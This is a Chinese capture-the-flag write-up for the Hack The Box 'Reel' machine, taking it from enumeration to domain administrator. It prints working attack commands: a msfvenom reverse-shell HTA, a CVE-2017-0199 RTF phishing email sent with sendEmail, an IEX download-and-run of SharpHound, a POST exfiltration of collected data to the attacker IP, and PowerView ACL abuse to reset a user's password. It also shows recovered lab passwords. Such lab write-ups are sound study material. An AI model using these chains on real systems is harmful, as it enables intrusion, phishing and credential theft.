基本信息

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
$ nmap -sC -sV -Pn 10.10.10.77
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-17 13:47 CST
Nmap scan report for 10.10.10.77
Host is up (0.068s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18 11:19PM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.91%I=7%D=11/17%Time=5FB36420%P=x86_64-apple-darwin19.6.0
SF:%r(NULL,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Ma
SF:il\x20Service\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.
SF:\r\n")%r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HEL
SF:O\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VR
SF:FY\r\n")%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20B
SF:ad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20com
SF:mands\r\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20
SF:Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20co
SF:mmands\r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x
SF:20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20
SF:commands\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503
SF:\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x
SF:20commands\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r
SF:(DNSVersionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSSt
SF:atusRequestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"
SF:220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20comm
SF:ands\r\n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(
SF:Kerberos,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220
SF:\x20Mail\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Servic
SF:e\x20ready\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20read
SF:y\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence
SF:\x20of\x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20read
SF:y\r\n")%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDA
SF:PBindReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"22
SF:0\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x
SF:20of\x20commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 2s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2020-11-17T05:51:01+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-11-17T05:50:58
|_ start_date: 2020-11-17T05:44:17

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 251.10 seconds

FTP

ftp可以匿名访问:

AppLocker.docx

里面就一句话:

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

readme.txt

也是很少的内容:

please email me any rtf format procedures - I’ll review and convert.

new format / converted documents will be saved here.

Windows Event Forwarding.docx

是一些日志信息,在元数据中得到一个邮箱地址 nico@megabank.com :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
$ exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number : 12.00
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 14 kB
File Modification Date/Time : 2020:11:17 13:51:41+08:00
File Access Date/Time : 2020:11:17 13:52:20+08:00
File Inode Change Date/Time : 2020:11:17 13:55:59+08:00
File Permissions : rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000

SMTP

就是手工尝试发现接受任意reel.htb邮箱,然后进行枚举

smtp-user-enum

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
➜  Reel smtp-user-enum -M RCPT -U users.txt -t 10.10.10.77
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

----------------------------------------------------------
| Scan Information |
----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 15
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............

######## Scan started at Thu Nov 12 20:06:01 2020 #########
10.10.10.77: reel@htb exists
10.10.10.77: reel@htb.local exists
10.10.10.77: administrator@htb exists
10.10.10.77: admin@htb exists
10.10.10.77: reel@reel.htb exists
10.10.10.77: root@htb exists
10.10.10.77: sadfasdfasdfasdf@htb exists
10.10.10.77: nico@megabank.com exists
10.10.10.77: htb@metabank.com exists
######## Scan completed at Thu Nov 12 20:06:03 2020 #########
9 results.

15 queries in 2 seconds (7.5 queries / sec)

users.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
reel
administrator
admin
root
reel@htb
reel@htb.local
reel@reel.htb
administrator@htb
admin@htb
root@htb
sadfasdfasdfasdf@htb
nico@megabank.com
0xdf@megabank.com
htb@metabank.com

RTF vuln

上面的readme中提示了email rtf格式文件,相关漏洞:

  • bhdresh/CVE-2017-0199: Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.
    https://github.com/bhdresh/CVE-2017-0199

生成hta

首先直接msfvenom生成一个恶意hta:

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f hta-psh -o msfv.hta

生成RTF

然后直接用漏洞利用脚本生成RTF文件:

1
python CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.14.6/msfv.hta -t rtf -x 0

sendemail && getshell

然后准备就绪,发送钓鱼邮件,getshell:

1
2
3
sudo python -m SimpleHTTPServer 80
nc -lvvp 443
sendEmail -f miao@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a invoice.rtf -s 10.10.10.77 -v

msf一键

msf有exploit/windows/fileformat/office_word_hta这个模块,可以一键生成hta,rtf文件,启动监听,只需要自己sendemail就可以

user flag

得到的nico用户shell,桌面得到user.txt:

nico to tom

cred.xml

nico用户桌面有个cred.xml文件,里面是tom账号认证信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>

creds

直接用powersell解析这个xml,得到tom用户的密码:

1
2
3
4
5
6
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"

UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB

ssh

注意前面开了22端口SSH,tom账号可以直接ssh登录:

提权信息

tom用户桌面AD Audit目录直接有BloodHound(这个确实是靶机原本就有的,不是别人传的)和一个note.txt:

groups

根据提示信息,去看一下其他用户组,发现Backup_Admins组,这类用户组一般都有特权:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$groups = [adsi] "LDAP://REEL:389/OU=Groups,DC=HTB,DC=LOCAL"
$searcher = New-Object System.DirectoryServices.DirectorySearcher $groups
$searcher.Filter = '(objectClass=Group)'
$results = $searcher.FindAll()
foreach ($result in $results) {$group = $result.Properties;$group.name}

Backup_Admins
AppLocker_Test
SharePoint_Admins
DR_Site
SQL_Admins
HelpDesk_Admins
Restrictions
All_Staff
MegaBank_Users
Finance_Users
HR_Team

note.txt

Findings:

Surprisingly no AD attack paths from user to Domain Admin (using default shortes
t path query).

Maybe we should re-run Cypher query against other groups we’ve created.

BloodHound

虽然靶机里有bloodhound的结果,但因为现在新版本格式已经改变了,自己重新传一个跑一下,结果拿回来分析,传输结果麻烦点,base64编码解码还原成zip:

1
2
3
4
5
6
7
IEX (New-Object Net.Webclient).downloadstring("http://10.10.14.6:9999/SharpHound.ps1")
Invoke-BloodHound -CollectionMethod All

$Base64String = [System.convert]::ToBase64String((Get-Content -Path 'c:/temp/20201117065659_BloodHound.zip' -Encoding Byte))
Invoke-WebRequest -Uri http://10.10.14.6:4445 -Method POST -Body $Base64String

echo <base64 encoded zip file> | base64 -d -w 0 > bloodhound_reel.zip

简单分析,发现tom用户可以通过claire用户到Backup_Admins:

tom to claire

就是导入powerview,根据bloodhound信息一步步,然后就可以用我们设置的密码ssh登录claire账户:

1
2
3
4
5
6
7
8
9
10
# 导入powerview
. .\PowerView.ps1
# 将tom设置为claire的ACL的所有者
Set-DomainObjectOwner -identity claire -OwnerIdentity tom
# 授予tom权限以更改该ACL上的密码
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
# 创建一个凭证,然后设置克莱尔的密码
$cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $cred
# 以上操作建议直接一次性复制粘贴,有自动重置

claire to Backup_Admins

根据bloodhound的信息,claire对Backup_Admins有GenericWrite权限,还是一步步,(预期是到backup,bloodhound给的提示是能到domain admin的:

1
2
net group backup_admins claire /add
# 添加到backup_admins组后需要重新登录才会生效

Backup_Admins to Administrator

查看权限,backup_admins对Administrator有完全访问权限:

1
2
3
4
5
6
7
claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
HTB\Backup_Admins:(OI)(CI)(F)
HTB\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files

但直接去读root.txt还是被禁止:

Backup Scripts

备份脚本里得到admin密码:

1
2
# admin password
$password="Cr4ckMeIfYouC4n!"

root flag

然后就直接登录Administrator,桌面得到root.txt:

参考资料